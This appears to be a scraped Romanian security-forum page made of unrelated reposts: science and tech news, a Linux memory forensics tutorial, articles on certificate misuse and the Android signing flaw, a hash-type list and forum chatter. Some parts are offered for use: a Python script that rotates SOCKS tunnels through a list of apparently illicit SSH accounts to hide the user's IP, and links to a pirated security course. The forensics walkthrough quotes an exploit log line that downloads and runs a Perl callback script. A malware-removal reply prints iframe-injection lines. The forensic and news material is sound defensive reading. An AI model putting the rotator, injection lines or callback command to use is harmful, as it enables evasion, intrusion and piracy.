aceast? camer?, explic? omul de ?tiin??. Rezultatele studiului ofer? un model ce explic? modul în care se pot forma amintirile false în rândul oamenilor. Înainte ca ?tiin?a s? conceap? testarea ADN, numero?i infractori erau condamna?i în baza declara?iilor martorilor. Ulterior, când ADN-ul lor a fost testat, „trei sferturi din oamenii condamna?i la sentin?e lungi în închisoare pe baza declara?iilor martorilor s-au dovedit a fi nevinova?i”, explic? Tonegawa. Cercet?torul ofer? un exemplu celebru al unei femei care urm?rea o emisiune TV când un om a p?truns în apartamentul s?u ?i a violat-o. Omul pe care femeia l-a acuzat de viol era un psihiatru celebru care era invitat într-o emisiune televizat? în timp ce femeia era violat?. Psihiatrul era într-un studio TV la momentul comiterii violului, astfel c? nu putea s? fie el violatorul, îns? femeia jura c? el este vinovatul, deoarece î?i formase o amintire fals? prin care asocia sunetul vocii b?rbatului cu violul. „Ca în cazul ?oarecilor no?tri, amintirea fals? a fost mai puternic?”, a explicat Tonegawa. Cum de au ajuns oamenii s? aib? abilitatea de a forma amintiri false? Tonegawa speculeaz? c? acesta este pre?ul pe care oamenii îl pl?tesc pentru creativitate. Imagina?ia ne face inventivi, dar totodat? ne face predispu?i s? amestec?m evenimente care au avut loc cu unele ce nu s-au întâmplat. „Oamenii sunt foarte creativi. Ca un efect secundar, form?m amintiri false”, a concluzionat cercet?torul. Sursa: Cercet?torii au reu?it s? implanteze amintiri false în creier ?i au în?eles de ce rememor?m evenimente ce nu au avut loc

Scriptul de mai jos automatizeaza putty-ul a.i. sa schimbe ip-ul la un interval de timp stabilit de utilizator. Creaza un tunel ssh cu unu din conturile gasite in fisierul nologine.txt, contul la care se conecteaza este ales in mod aleator, cand expira timpul stabilit se creaza un nou tunel folosind alt cont ales aleator si tot asa. In cazul in care intampina probleme la utilizarea unui cont se trece automat la alegerea altuia. Scriptul ruleaza pana este inchis din task manager. Pentru a putea fi utilizat, in acelasi director cu scriptul de mai jos trebuie sa existe: putty.exe PuTTY Download Page nologine.txt nologine.txt contine conturile ssh(nologin), cate unul pe linie: ip1:user1:parola1 ip2:user2:parola2 script: #Python 2.7.* #Copyright Rstforums.com import random import time import subprocess import datetime #################config################# port = "1080" exchangetime = "120" # in secunde sshlist = "nologine.txt" ######################################## dict = {} i = 1 for line in open(sshlist,"r"): line = line.rstrip() sshlist = line.split(":") dict[i] = sshlist i = i+1 while True: now = datetime.datetime.now() aleator = random.randint(1, len(dict.keys())) date = dict[aleator] ip = date[0] username = date[1] password = date[2] command = "putty.exe -D " + str(port) +" -l " + str(username) + " -pw " + str(password) + " -ssh " + str(ip) print str(now.year) +"."+ str(now.month) +"."+ str(now.day) +" "+ str(now.hour) +":"+ str(now.minute) + " -->" + str(ip) try: puttyproc = subprocess.Popen(command) time.sleep(int(exchangetime)) puttyproc.terminate() except: pass ##### #End. #####

Curs PHP Partea a I a:Introducere Curs PHP Partea a II a:Afisarea Informatilor si Variabilele Curs PHP Partea a III a:Instructiunile IF Curs PHP Partea a IV a:Cicluri Si Vectori Curs PHP Partea a V a:E-mail cu PHP Curs PHP Partea a VI a:PHP cu Formulare Curs PHP Partea a VII a:Observa?ii finale Operatii Matematice Aflare Host de NET Aflare IP

Magazinele deja testeaza tehnologia de recunoastere faciala, folosita pentru a identifica personalitatile care trec pragul comerciantilor. Ea functioneaza prin analizarea unor imagini video, din care sunt extrase doar fetele oamenilor. Programul apoi face niste masuratori pentru a crea un cod numeric, cunoscut sub numele de "sablon facial", si il trec printr-o baza de date, care cuprinde fetele celebritatilor sau ale clientilor valorosi, potrivit Sunday Times, citat de NPR. Daca o fata este gasita in baza de date, programul trimite un mesaj de alerta angajatilor magazinului prin computer, iPad sau smartphone, furnizandu-le detalii precum marimea hainelor, cumparaturile favorite sau istoricul achizitiilor acestuia. Programul functioneaza chiar daca clientii poarta ochelari de soare, palarii sau esarfe. Teste recente au aratat ca parul facial, imbatranirea sau schimbarile de greutate sau de culoare a parului nu afecteaza acuratetea sistemului de identificare. In prezent, noua tehnologie este testata in 12 magazine si hoteluri, a caror nume si locatie sunt tinute secret, din America, Marea Britanie si Orientul Indepartat. Compania britanica NEC IT Solutions foloseste o tehnologie similara pentru firme de securitate, care o utilizeaza, de aceasta data, pentru identificarea teroristilor si criminalilor. Violarea intimitatii? Manolo Almagro, vicepresedintele pe probleme digitale al agentiei de retail TPN Inc., spune ca tehnologia nu este noua, ci doar o versiune mai sofisticata a Google Images, care permite utilizatorilor sa gaseasca fotografii similare cu alte imagini. Dar, spune acesta, recunoasterea faciala calca pe un teritoriu periculos - Google a fost nevoit sa renunte la programul de recunoastere faciala din Google Glass din cauza ingrijorarilor legate de violarea intimitatii. Cand retailerul de imbracaminte Nordstrom a dezvaluit ca urmareste clientii prin intermediul semnalului Wi-Fi al telefoanelor, lantul de magazine a fost pus la zid si a trebuit sa opreasca aceasta practica. Retailerii jongleaza intre preocuparile privind violarea intimitatii clientilor si dorinta de a-si creste veniturile prin marketing analitic. Chris de Silva, vicepresedintele pe solutii IT al NEC, spune ca s-a confruntat cu ingrijorari privitoare la violarea intimitatii, dar a constatat ca majoritatea clientilor importanti sunt "chiar bucurosi sa isi puna la dispozitie informatiile, deoarece vor servicii mai rapide si personalizate". Tehnologie prea scumpa Cu toate acestea, Manolo Almagro sustine ca serviciul nu va deveni unul global, mai ales ca este scump. "Exista multe alte metode alternative, mai eficente, cum ar fi telefonul mobil, pe care il poate folosi pentru a obtine informatii", a opinat acesta. Deja comercianti precum Family Dollar, Benetton si Warby Parker iau datele personale ale clientilor din smartphone pentru a personaliza serviciile, acestia precizand ca situatia este similara cu ceea ce se intampla online. Insa Almagro considera ca este ingrijorator ce fac comerciantii cu datele colectate. Sursa: Spionul din magazine: Recunoasterea faciala, noua ''arma'' a comerciantilor articol in engleza: High-End Stores Use Facial Recognition Tools To Spot VIPs : All Tech Considered : NPR

1, Visit this PAGE, and click on the big orange “Sign Up For Free” button. Follow the instructions to create your new account. 2, Next, verify Your AT&T Access ID. You will be sent an email with verification instructions. Please follow the link in the email to verify your AT&T Access ID. Note if you do not receive the email within 5 minutes, please check your spam folder. 3, With that done, click the Accounting Settings link (in your Locker), then click “My Plan”, followed by “Upgrade Plan”. Choose the Free 50GB option (Limited Time Offer) and take it from there. 4 . Check My Plan again and you will find you’ve got 50GB of cloud storage for free, no strings attached. Sursa

Like many of you, I have been watching the development of memory forensics over the last two years with a sense of awe. It is amazing how far the field has come since the day Chris Betz, George Garner and Robert-Jan Moral won the 2005 DFRWS forensics challenge. Of course, similar to other forensic niches, the majority of progress has been made on Windows memory forensics. There is good reason for this. Memory can be extremely fickle, with layouts and structures changing on a whim. As an example, the symbols file for Windows 7 SP1x86 is 330MB, largely due to it needing to support major changes that can occur in every service pack and patch. The fact that we have free tools such as Volatile Systems Volatility and Mandiant Redline supporting memory images of arbitrary size from (nearly) every modern version of Windows is nothing short of miraculous. Nowhere is it more obvious how far the memory analysis field has come than looking at the recent innovations in Mac and Linux memory forensics. Examiners of these less popular platforms have had to sit patiently for years as Windows memory forensics moved from being feasible for OS internals experts to being approachable for the masses. Against all odds, Linux memory analysis has recently seen rapid innovations. If support for the various Windows versions came slowly, imagine the complexity posed by the myriad flavors of Linux and the long list of possible kernel versions. It turns out that the Volatility framework is particularly well suited to tackle this Hydra with its abstraction layers facilitating everything from different image formats to swappable OS profiles to rapid plugin development. Getting Started – SVN Checkout I recommend upgrading to (at least) version 2.3 of Volatility when getting familiar with Linux memory. The 2.3 plugins are still in beta, but there have been some significant improvements that greatly facilitate analysis. Adding the latest version is easy via subversion checkout. For instance, in the SANS SIFT workstation, you can run the following commands: mkdir /usr/local/src/vol2.3 svn checkout http://volatility.googlecode.com/svn/trunk /usr/local/src/vol2.3/ chmod 755 /usr/local/src/vol2.3/vol.py ln -s /usr/local/src/vol2.3/vol.py /usr/local/bin/voldev.py voldev.py –info Creating a profile The only significant hurdle to performing Linux memory analysis in Volatility is the requirement to create a bespoke profile for the flavor of Linux with which you are working. Creating a profile is surprisingly easy — a great testament to the flexibility of the framework. If you work in a pseudo-homogeneous environment you may only need to pre-build a few profiles to cover the systems you are likely to encounter. If you don’t have the luxury of pre-building profiles, the steps can easily be scripted and included in your incident response scripts (run after memory acquisition and substituting the Subversion checkout of Volatility with just the files necessary to run the “make” command). The Volatility wiki does an excellent job of describing the profile creation process, and the default Volatility SVN checkout contains the tools you need. In my case, I was interested in working with an older version of Debian because I wanted to redo Challenge 7 of the Honeynet Project Forensic Challenge 2011. While 2011 isn’t that long ago, it might as well be ancient times for fast moving Linux distributions. Getting a running copy of the Debian 5 (Lenny) distribution took a few extra steps than would ordinarily have been required of a more modern distribution. Here was my process: Download the correct distribution being mindful of kernel version and architecture Run “uname –a” or read the dmesg log on a live system. If you only have a memory image, strings can identify the correct distribution and kernel version. The system type for the Honeynet challenge was Debian 5 2.6.26 kernel x86 Install the distribution into a virtual machine (VM) Due to the age of the distribution, the default update mirrors were no longer supported. This required modifying /etc/apt/sources.list to point to the archive servers at Index of / The repository misalignment resulted in a very minimal Linux install. With apt now pointing to the correct archive, I ran apt-get update and apt-get install debian-archive-keyring to include some of the basic packages Watch for attempts by the distribution to auto-upgrade (and do not run apt-get upgrade) Install Subversion in the VM and download Volatility apt-get install subversion-tools svn checkout volatility - Revision 3456: /trunk /usr/local/src/volatility/ Create the kernel data structures file using dwarfdump My minimal installation required several additional packages: apt-get install make apt-get install linux-headers-$(uname -r) apt-get install dwarfdump ./usr/local/src/volatility/tools/linux/make Locate the kernel symbol file In this case the full path was /boot/System.map-2.6.26-2-686 Zip up your results and move to your forensic workstation The final result should be a module.dwarf file and a “System.map” symbol file located within a zip archive. This zip archive must be copied to the overlays/linux folder within the Volatility distribution you intend to use. The –info command will display all recognized profiles. Starting the Analysis I found the 2011 Honeynet Challenge interesting because the winner, Dev Anand, and several others successfully used early versions of Linux memory analysis to help solve it. I was interested in gauging how far the state of the art had progressed since then. Simply put, the Volatility project has truly taken Linux analysis to the next level, with 40 plugins in version 2.3 providing vast capabilities that simply did not previously exist. Many of the questions that previously required access to the system disk can now be answered just as easily from the memory image. I’ll use the challenge to demonstrate some of the plugins. linux_netstat Processes and network connections are the first things I review when starting analysis of a new memory image. In this case the linux_netstat plugin identifies two interesting established connections to IP address 192.168.56.1 using ports 4444 and 8888. The connections are tied to processes named “sh” and “nc”. Further, we see a couple of interesting listening daemons: sshd on port 22 and exim4 on port 25. linux_psaux The linux_psaux plugin augments the standard process listing with command line information. While not terribly helpful here, the output does tend to reinforce that “nc” may in fact be a netcat binary. NOTE: You only need to set the VOLATILITY_PROFILE environment variable once, but it is included in each of the examples as a reminder that the demonstrated plugins require a Linux profile value set or included via the –profile parameter. linux_yarascan The Volatility yarascan plugins for Windows, Mac, and now Linux leverage open-source yara signatures to provide a simple and powerful means to search user and kernel memory. In this example I was simply looking for the suspicious IP address string from the linux_netstat command, but keep in mind that an entire rules file could have been used. The first hit (found within process rsyslogd) could be a partial log entry related to a SSH login, which should be possible to verify within the /var/log/auth.log. This log could be found and exported using the linux_find_file Volatility plugin, but, in this case, it does not appear to be resident in memory. A review of the auth.log on disk shows several related failed logins from 192.168.56.1 via SSH: Feb 6 15:20:54 victoria sshd[2157]: Failed none for invalid user ulysses from 192.168.56.1 port 44616 ssh2 The second and third yarascan hits displayed look like commands or related output. Since the hits were found in the bash process (PID 2042), the bash command line history would be worth reviewing. linux_bash The linux_bash plugin is a particularly impressive plugin as it carves out individual bash history entries and reassembles them for analysis. If bash history exists, it can provide a very in-depth view into user activity. In this case we see a lot of strange activity surrounding the exim server as well as attempts to copy the entire sda drive, sda1 partition and memory over to the suspicious IP addresses. A challenge in this investigation would be differentiating legitimate system administration actions from hacker activity. Given the manipulations surrounding exim, a logical next step might be to review the exim logs in /var/log/exim4. The /var/log/exim4/mainlog recorded several errors referencing the previously discovered suspicious IP address and ports as well as multiple wget attempts to download files into the /tmp folder: 2011-02-06 15:08:13 H=(abcde.com) [192.168.56.101] temporarily rejected MAIL <root@local.com>: failed to expand ACL string “pl 192.168.56.1 4444; sleep 1000000?”}} ${run{/bin/sh -c “exec /bin/sh -c ‘wget http://192.168.56.1/c.pl -O /tmp/c.pl;perl /tmp/c.pl 192.168.56.1 4444; sleep 1000000?”}} … linux_dentry_cache To improve file system performance, Linux caches directory entries and inode information as files are opened. The linux_dentry_cache Volatility plugin returns the contents of the directory entry cache, giving examiners a detailed view of the most recently referenced files in the file system. In this case, I used the plugin in an attempt to identify whether the attacker succeeded in downloading tools to the /tmp directory. It appears that the attacker was eventually successful in retrieving the c.pl file. Further, the rk.tar archive looks interesting and should be analyzed. Conclusion Linux memory forensics has definitely come of age, and I highly recommend including it in your incident response process. Volatility makes it easy to get started. You can find the memory image demonstrated here at the Honeynet Project and download the Debian profile created for this post here. When you are done working with that image, Raytheon SecondLook provides a large selection of both clean and infected memory images. Finally, as you create new Linux profiles, please consider donating them back to the Volatility Linux profiles page (details are still pending on how the Volatility crew will manage this process). Sursa:Getting Started with Linux Memory Forensics | Forensic Methods

Online communication and data sharing practices rely heavily on digital certificates to encrypt data as well as authenticate systems and people. There have been many discussions about the cracks starting to develop in the certificate-based Public Key Infrastructure (PKI) on the web. Let’s consider how the certs are typically used and misused to prepare for exploring ways in which the certificate ecosystem can be strengthened. How Digital Certificates are Used Digital certificates are integral to cryptographic systems that are based on public/private key pairs, usually in the context of a PKI scheme. Wikipedia explains that a certificate binds a public key to an identity. Microsoft details the role that a Certificate Authority (CA) plays in a PKI scenario: "The certification authority validates your information and then issues your digital certificate. The digital certificate contains information about who the certificate was issued to, as well as the certifying authority that issued it. Additionally, some certifying authorities may themselves be certified by a hierarchy of one or more certifying authorities, and this information is also part of the certificate." HTTPS communications are safeguarded by SSL/TLS certificates, which help authenticate the server and sometimes the client, as well as encrypt the traffic exchanged between them. Digital certificates also play a critical role in signing software, which helps determine the source and authenticity of the program when deciding whether to trust it. Certificates could also be used as the basis for securing VPN and Wi-Fi connections. Misusing Digital Certificates In the recent years, the PKI environment within which digital certificates are created, maintained and used began showing its weaknesses. We’ve witnessed several ways in which the certs have been misused in attacks on individuals, enterprises and government organizations: Stolen code-signing certificates and the associated private keys were used to sign malicious software. For instance, a breach at the security firm Bit9 allowed attackers to steal one of the company’s certs and use it to distribute malware. An apparently-stolen cert was used to sign a malicious Java applet. An attack on the browser company Opera allowed the intruder to access a code-signing cert and use it to sign malware. Code-signing certs stolen from Adobe were used to sign malicious software. It’s not uncommon for malware to be programmed to capture victims’ code-signing and other certificates, which will ensure that we’ll see more incidents of stolen certificates being misused. CAs issued weak or improper certificates, which were later used in attacks. For example, DigiCert mistakenly sold a certificate to a company that didn’t actually exist; the cert was used to sign a malicious executable. Another CA named Digicert Sdn (no relation to DigiCert), issued certs with weak “512-bit RSA keys and missing certificate extensions," according to its parent company Entrust. Later, two of the certs "were used to sign malware used in a spear phishing attack against another Asian certificate authority." In another blunder, a CA named TURKTRUST mistakenly issued certs that have led to the impersonation of Google’s servers. Man-in-the-middle (MITM) attacks abused certificates to intercept SSL/TLS traffic. Software rarely complains when a server’s SSL/TLS certificate has been signed by a trusted, but unexpected CA. For example, one person noticed that when connecting to Gmail via IMAP/SSL from a hotel, the server’s certificate was signed by an entity other than Google. A similar technique was allegedly used by Nokia, presumably for legitimate purposes, to decrypt phones’ HTTPS activities. There are probably many MITM instances where the traffic was captured illegitimately; unfortunately, such situations are often hard to detect. Malware installed illegitimate certificates, configuring infected systems to trust them. For instance, a malicious Browser Helper Object (BHO) installed a fake Verisign cert as a Trusted Root Certificate Authority after infecting the system to eliminate security warnings. In another example, spyware acted as a local proxy for SSL/TLS traffic and installed a rogue certificate to conceal this behavior. Installing a fake root CA certificate on the compromised system can also assist with phishing scams, because they allow the attacker to set up a fake domain that uses SSL/TLS and passes certificate validation steps. These were just some examples of real-world incidents where digital certificates were misused. In a follow-up post, we’ll look at the initiatives aimed at strengthening the ecosystem within which the certificates are issued, validated and utilized. Stay tuned. Sursa: How Digital Certificates Are Used and Misused

Most of us host part or maybe even all of our infrastructure at hosting providers. They provide you with floor space, rack space, or in cloud environments with platforms and software for you to use. As with all of these solutions there are pros and cons to having your hardware hosted. In cloud environments the hardware and often software typically belongs to the provider and only the data belongs to you. What could go wrong? As security professionals we get to discuss the risks of these kinds of arrangements and most of us will raise the risk of the provider going south or the data being unavailable for other reasons. The answer we often get is along the lines of “oh that never happens and we have backups”. Unfortunately that doesn’t always help and losing data isn’t the only issue as has been aptly demonstrated this week when a number of datacentres Belgium and the Netherlands closed up shop. Belgische tak Datahouse is failliet verklaard - IT Pro - Nieuws - Tweakers Datahouse Belgium failliet verklaard - Nieuws - Datanews.be - Datanews.be Datahouse Belgium failliet verklaard op verzoek van Scarlet Business | ISPam.nl Datahouse belgië failliet. is datahouse nl de volgende? | intall.nl In a nutshell the provider was declared bankrupt, the doors closed and connections were cut. As the articles state customers were denied access to their servers whilst the bankruptcy processes were established. In a number of cases connectivity to servers was cut, denying access to the data. So what risks are there when a hosting provider goes bust? Denied access to physical servers – In many hosting situations the line between who owns what is difficult and often physical access will be denied until ownership can be demonstrated. In the mean time you may have expensive equipment sitting in a datacentre that you can no longer access. Denied access to data (internet) – This can happen a number of ways. The Internet connection may be removed which obviously cuts your and anyone else’s access. Sometimes machines are shut down. Whilst many administrators may decide to keep things running, after all earning some money is better than none, to cut cost supporting services may be reduced and if something breaks it is unlikely to get fixed. Denied access to data (Local) – You may decide to go pick up your data, but getting access may not be that easy. So unless you can retrieve it remotely you may have to kiss that good bye. Backups – Any backups taken by the hosting provider are unlikely to be accessible. Depending on the systems used to manage backups it may be quite a task to get them. Even if you get the physical tapes (if used) you are unlikely to get the backup catalogue, so retrieving data will be difficult. Disclosure of data – Physical access usually trumps most of the controls many of us place on our hosted environment and in the cloud we do not have any control. So it is quite likely that you will not be able to deny access of third parties to your data. Least of all you will be left with the cost of moving operations to an alternate location and as most of use who have been involved with datacentre moves know that is not a trivial task. It would be mean to just leave it there, so what can be done about this to mitigate the risks? Denied Access – If denied access to your servers or data a DR environment is probably your best bet. Being able to run up services elsewhere provides processing capabilities whilst lawyers sort out getting physical assets back. However tempting it may be it is probably not a great idea to have the production environment and your DR environment hosted by the same organisation. Backups – Make your own. Do not rely on the hosting provider to do all the backups. Alternatively make sure that backups are stored elsewhere, including the catalogue so you can readily identify the data on the tapes, if needed. Disclosure of data – This is probably the most difficult one and makes you wish that the mission impossible slogan (this message will self-destruct in …) is an actuality. Not many of us are in the habit of full disk encryption on servers, but that may be the only way and won’t help in a PAAS or SAAS situation. Sursa: Internet Storm Center Diary 2013-07-20

Cam multe sugestii in ultimile zile... 1. acesta este un forum pt personele pasionate de securitatea it, faptul ca unii useri mai castiga niste $ din clickuri este ok, dar nu trebuie transformat forumul in taraba de click exchange 2. daca cineva are "invitation code catre Dropbox , VPN," etc. si posteaza(la categoria corecta,ex: progr sec/links/tools/etc.), nu cred ca va fi sanctionat cat timp are un minim de bun simt: link referal: (daca dai click aici imi dai 1GB ) link direct: 3. daca totusi cineva vrea sa ajute comunitatea si nu stie cum, cateva exemple de urmat: https://rstforums.com/forum/65916-tutorial-python-3-2-a.rst https://rstforums.com/forum/61374-cum-dezvolti-un-exploit-01-a.rst https://rstforums.com/forum/71542-rst-index-alternative.rst

Vulnerability allows attackers to modify Android apps without breaking their signatures The vulnerability affects 99 percent of Android devices and has existed since Android 1.6, researchers from security firm Bluebox said A vulnerability that has existed in Android for the past four years can allow hackers to modify any legitimate and digitally signed application in order to transform it into a Trojan program that can be used to steal data or take control of the OS. Researchers from San Francisco mobile security startup firm Bluebox Security found the flaw and plan to present it in greater detail at the Black Hat USA security conference in Las Vegas later this month. The vulnerability stems from discrepancies in how Android apps are cryptographically verified, allowing an attacker to modify application packages (APKs) without breaking their cryptographic signatures. When an application is installed and a sandbox is created for it, Android records the application's digital signature, said Bluebox Chief Technology Officer Jeff Forristal. All subsequent updates for that application need to match its signature in order to verify that they came from the same author, he said. This is important for the Android security model because it ensures that sensitive data stored by one application in its sandbox can only be accessed by new versions of that application that are signed with the original author's key. The vulnerability identified by the Bluebox researchers effectively allows attackers to add malicious code to already signed APKs without breaking their signatures. The vulnerability has existed since at least Android 1.6, code named Donut, which means that it potentially affects any Android device released during the last four years, the Bluebox researchers said Wednesday in a blog post. "Depending on the type of application, a hacker can exploit the vulnerability for anything from data theft to creation of a mobile botnet," they said. The vulnerability can also be exploited to gain full system access if the attacker modifies and distributes an app originally developed by the device manufacturer that's signed with the platform key -- the key that manufacturers use to sign the device firmware. "You can update system components if the update has the same signature as the platform," Forristal said. The malicious code would then gain access to everything -- all applications, data, accounts, passwords and networks. It would basically control the whole device, he said. Attackers can use a variety of methods to distribute such Trojan apps, including sending them via email, uploading them to a third-party app store, hosting them on any website, copying them to the targeted devices via USB and more. Some of these methods, especially the one involving third-party app stores, are already being used to distribute Android malware. Using Google Play to distribute apps that have been modified to exploit this flaw is not possible because Google updated the app store's application entry process in order to block apps that contain this problem, Forristal said. The information received by Bluebox from Google also suggests that no existing apps from the app store have this problem, he said. However, if an attacker tricks a user to manually install a malicious update for an app originally installed through Google Play, the app will be replaced and the new version will no longer interact with the app store. That's the case for all applications or new versions of applications, malicious or non-malicious, that are not installed through Google Play, Forristal said. Google was notified of the vulnerability in February and the company shared the information with their partners, including the members of the Open Handset Alliance, at the beginning of March, Forristal said. It is now up to those partners to decide what their update release plans will be, he said. Forristal confirmed that one third party device, the Samsung Galaxy S4, already has the fix, which indicates that some device manufacturers have already started releasing patches. Google has not released patches for its Nexus devices yet, but the company is working on them, he said. Google declined to comment on the matter and the Open Handset Alliance did not respond to a request for comment. The availability of firmware updates for this issue will differ across device models, manufacturers and mobile carriers. Whether a combination of device manufacturers and carriers, which play an important role in the distribution of updates, coincide to believe that there is justification for a firmware update is extremely variable and depends on their business needs, Forristal said. "Ideally it would be great if everyone, everywhere, would release an update for a security problem, but the practical reality is that it doesn't quite work that way, he said." The slow distribution of patches in the Android ecosystem has long been criticized by both security researchers and Android users. Mobile security firm Duo Security estimated last September, based on statistics gathered through its X-Ray Android vulnerability assessment app, that more than half of Android devices are vulnerable to at least one of the known Android security flaws. Judging by Android's patch distribution history so far, the vulnerability found by the Bluebox researchers will probably linger on many devices for a long time, especially since it likely affects a lot of models that have reached end-of-life and are no longer supported. Sursa: Vulnerability allows attackers to modify Android apps without breaking their signatures | ITworld

Game publisher Ubisoft was breached and unauthorized parties accessed customers’ usernames, e-mail addresses and hashed passwords. Ubisoft urges all account owners to change their passwords at once. The French firm emailed its customers, informing them that “credentials were stolen and used to illegally access our online network” giving unauthorized people access to users’ accounts. No further details on the attack were given. Currently all compromised systems are closed off and the company is working to restore them. According to the email, no financial information was reached since Ubisoft has a payment processing company handle money-related data. “Please note that no personal payment information is stored with Ubisoft, meaning your debit/credit card information was safe from this intrusion” the e-mail reads. “Out of an abundance of caution, we also recommend that you change your password on any other Web site or service where you use the same or a similar password.” The e-mail includes a link to the company’s support page that people can use for further enquiries and additional information. Ubisoft has also set up a dedicated page to allow users to quickly and safely change their Uplay account passwords. So use it to immediately restore your account information and make sure you don’t have other accounts with the same password. Sursa:Ubisoft Breached, Sensitive Account Data Leaked | HOTforSecurity

Torrent: Offensive Security 2013 - FSU - Download - 4shared - Michael Hu Homework pack from course(4.5 mb): Multiupload.nl - upload your files to multiple file hosting sites! All slides/binaries/and other stuff in pack (38mb): Multiupload.nl - upload your files to multiple file hosting sites! credite pt linkuri: mangotown, 0xdraven

ai gasit tu ceva, dar nu tot. m-am uitat peste fisierele postate de tine: ~13k - un backdoor/proxy ~36k - info stealer/generator de views * te poti astepta la ceva trafic ... cat timp nu o gasesti pe mama lor (programu care coord pe cele de mai sus), nu prea poti sa faci nimic cu manutele tale. oficial: utilizezi un removal tool ex: dr web, kaspersky neoficial: -metode neortodoxe cu riscuri pe masura ai putea instala un firewall (pt firewall-ul din windows are inclus bypass), daca esti pe xp iti recomand sygate si filtrezi tu manual care aplicatie sa se conecteze la internet si care nu, putand astfel sa tii malware-ul sub un oarecare control poti arunca o privire in start-up si dezactivezi tot ce nu cunosti, dupa care scoti pc din priza (unii malware isi verifica din cand in cand sau inainte de a se inchide daca mai au valorile in registri, scotand brusc pc din priza sunt ceva sanse sa nu mai reintroduca intrarile de start-up, riscu de a crapa pc este de asemenea prezent:) ) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run mai poti identifica procesele infectate utilizand tcpview, de asemenea in loc de task manager poti incerca process explorer parolele stocate pe pc(browsere, etc) poti sa-ti iei adio de la ele, cat timp nu elimini malware cred ca le schimbi degeaba * document.write('<iframe src="http://%s/" width=1 height=1></iframe>') document.write('<iframe src="http://%s/forum.php?%x" width=1 height=1></iframe>')

ADLER-32 ; CRC-16 ; CRC-16-CCITT ; CRC-32 ; CRC-32B ; DES(Unix) ; Domain Cached Credentials ; FCS-16 ; GHash-32-3 ; GHash-32-5 ; GOST R 34.11-94 ; Haval-128 ; Haval-128(HMAC) ; Haval-160 ; Haval-160(HMAC) ; Haval-192 ; Haval-192(HMAC) ; Haval-224 ; Haval-224(HMAC) ; Haval-256 ; Haval-256(HMAC) ; Lineage II C4 ; MD2 ; MD2(HMAC) ; MD4 ; MD4(HMAC) ; MD5 ; MD5(APR) ; MD5(Custom) ; MD5(HMAC) ; MD5(HMAC(Wordpress)) ; MD5(phpBB3) ; MD5(Unix) ; MD5(Wordpress) ; MySQL ; MySQL5 ; NTLM ; Palshop ; RAdmin v2.x ; RipeMD-128 ; RipeMD-128(HMAC) ; RipeMD-160 ; RipeMD-160(HMAC) ; RipeMD-256 ; RipeMD-256(HMAC) ; RipeMD-320 ; RipeMD-320(HMAC) ; SHA-1 ; SHA-1(Django) ; SHA-1(HMAC) ; SHA-1(MaNGOS) ; SHA-1(MaNGOS2) ; SHA-224 ; SHA-224(HMAC) ; SHA-256 ; SHA-256(Django) ; SHA-256(HMAC) ; SHA-384 ; SHA-384(Django) ; SHA-384(HMAC) ; SHA-512 ; SHA-512(HMAC) ; Snefru-128 ; Snefru-128(HMAC) ; Snefru-256 ; Snefru-256(HMAC) ; Tiger-128 ; Tiger-128(HMAC) ; Tiger-160 ; Tiger-160(HMAC) ; Tiger-192 ; Tiger-192(HMAC) ; Whirlpool ; Whirlpool(HMAC) ; XOR-32 ; md5($pass.$salt) ; md5($pass.$salt.$pass) ; md5($pass.md5($pass)) ; md5($salt.'-'.md5($pass)) ; md5($salt.$pass) ; md5($salt.$pass.$salt) ; md5($salt.$pass.$username) ; md5($salt.md5($pass)) ; md5($salt.md5($pass).$salt) ; md5($salt.MD5($pass).$username) ; md5($salt.md5($pass.$salt)) ; md5($salt.md5($salt.$pass)) ; md5($salt.md5(md5($pass).$salt)) ; md5($username.0.$pass) ; md5($username.LF.$pass) ; md5($username.md5($pass).$salt) ; md5(1.$pass.$salt) ; md5(3 x strtoupper(md5($pass))) ; md5(md5($pass)) ; md5(md5($pass).$pass) ; md5(md5($pass).$salt) ; md5(md5($pass).md5($pass)) ; md5(md5($pass).md5($salt)) ; md5(md5($salt).$pass) ; md5(md5($salt).md5($pass)) ; md5(md5($username.$pass).$salt) ; md5(md5(md5($pass))) ; md5(md5(md5(md5($pass)))) ; md5(md5(md5(md5(md5($pass))))) ; md5(sha1($pass)) ; md5(sha1(md5($pass))) ; md5(sha1(md5($pass)).sha1($pass)) ; md5(sha1(md5(sha1($pass)))) ; md5(strtoupper(md5($pass))) ; substr(md5($pass),0,16) ; substr(md5($pass),8,16) ; substr(md5($pass),16,16) ; sha1($pass.$salt) ; sha1($salt.$pass) ; sha1($salt.$username.$pass.$salt) ; sha1($salt.md5($pass)) ; sha1($salt.md5($pass).$salt) ; sha1($salt.sha1($pass)) ; sha1($salt.sha1($salt.sha1($pass))) ; sha1($username.$pass) ; sha1($username.$pass.$salt) ; sha1(md5($pass)) ; sha1(md5($pass).$salt) ; sha1(md5(sha1($pass))) ; sha1(md5(sha1(md5($pass)))) ; sha1(sha1($pass)) ; sha1(sha1($pass).$salt) ; sha1(sha1($pass).substr($pass,0,3)) ; sha1(sha1($salt.$pass)) ; sha1(sha1(sha1($pass))) ; sha1(strtolower($username).$pass) ; sha256($pass.$salt) ; sha256($salt.$pass) ; sha256(md5($pass)) ; sha256(sha1($pass)) ; sha384($pass.$salt) ; sha384($salt.$pass) ; sha512($pass.$salt) ; sha512($salt.$pass) ; aici: http://www.insidepro.com/hashes.php?lang=eng

